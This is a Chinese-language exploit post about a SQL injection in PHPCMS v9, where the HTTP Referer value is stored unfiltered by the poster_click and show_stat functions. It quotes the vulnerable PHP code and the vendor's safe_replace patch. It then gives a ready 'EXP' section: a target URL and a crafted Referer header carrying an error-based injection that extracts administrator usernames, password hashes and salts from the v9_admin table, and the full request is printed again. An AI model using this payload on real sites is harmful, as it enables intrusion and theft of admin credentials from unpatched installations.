PHPCMSv9 SQL注入(Rerferer注入)

  • A+
所属分类:漏洞时代
摘要

from:http://huakai.paxmac.org/?p=522360报告了该漏洞,地址:http://webscan.360.cn/news/news84,重要部分被打上了马赛克,根据分析漏洞,给出利用方法。
上面说的很详细了,由于poster_click函数在插入数据库的时候,没对http-referer做过滤,然后产生了注入。

from:http://huakai.paxmac.org/?p=522

360报告了该漏洞,地址:http://webscan.360.cn/news/news84,重要部分被打上了马赛克,根据分析漏洞,给出利用方法。
上面说的很详细了,由于poster_click函数在插入数据库的时候,没对http-referer做过滤,然后产生了注入。

 public function poster_click() {  $id = isset($_GET['id']) ? intval($_GET['id']) : 0;  $r = $this->db->get_one(array('id'=>$id));  if (!is_array($r) && empty($r)) return false;  $ip_area = pc_base::load_sys_class('ip_area');  $ip = ip();  $area = $ip_area->get($ip);  $username = param::get_cookie('username') ? param::get_cookie('username') : '';  if($id) {   $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();   $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));  }  $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));  $setting = string2array($r['setting']);  if (count($setting)==1) {   $url = $setting['1']['linkurl'];  } else {   $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];  }  header('Location: '.$url); }

在show_stat函数中同样出现了问题

protected function show_stat($siteid = 0, $spaceid = 0, $id = 0) {   $M = new_html_special_chars(getcache('poster', 'commons'));   if($M['enablehits']==0) return true;   //$siteid = intval($siteid);   $spaceid = intval($spaceid);   $id = intval($id);   if(!$id) return false;   if(!$siteid || !$spaceid) {    $r = $this->db->get_one(array('id'=>$id), 'siteid, spaceid');    $siteid = $r['id'];    $spaceid = $r['spaceid'];   }   $ip = ip();   $ip_area = pc_base::load_sys_class('ip_area');   $area = $ip_area->get($ip);   $username = param::get_cookie('username') ? param::get_cookie('username') : '';   $this->db->update(array('hits'=>'+=1'), array('id'=>$id));   $this->s_db->insert(array('pid'=>$id, 'siteid'=>$siteid, 'spaceid'=>$spaceid, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=>0));   return true;  } }

不过官方对这2个点都做了修复。
官方修复的方法:
safe_replace(HTTP_REFERER),对其进行了过滤。

function safe_replace($string) {  $string = str_replace('%20','',$string);  $string = str_replace('%27','',$string);  $string = str_replace('%2527','',$string);  $string = str_replace('*','',$string);  $string = str_replace('"','&quot;',$string);  $string = str_replace("'",'',$string);  $string = str_replace('"','',$string);  $string = str_replace(';','',$string);  $string = str_replace('<','&lt;',$string);  $string = str_replace('>','&gt;',$string);  $string = str_replace("{",'',$string);  $string = str_replace('}','',$string);  $string = str_replace('//','',$string);  return $string; }

EXP:

http://www.0day5.com/index.php?m=poster&c=index&a=poster_click&id=1

Referer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

经过修改后的http head是这样的

Host: www.0day5.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=&ltime=1357654307516&rtime=0 Referer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

PHPCMSv9 SQL注入(Rerferer注入)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: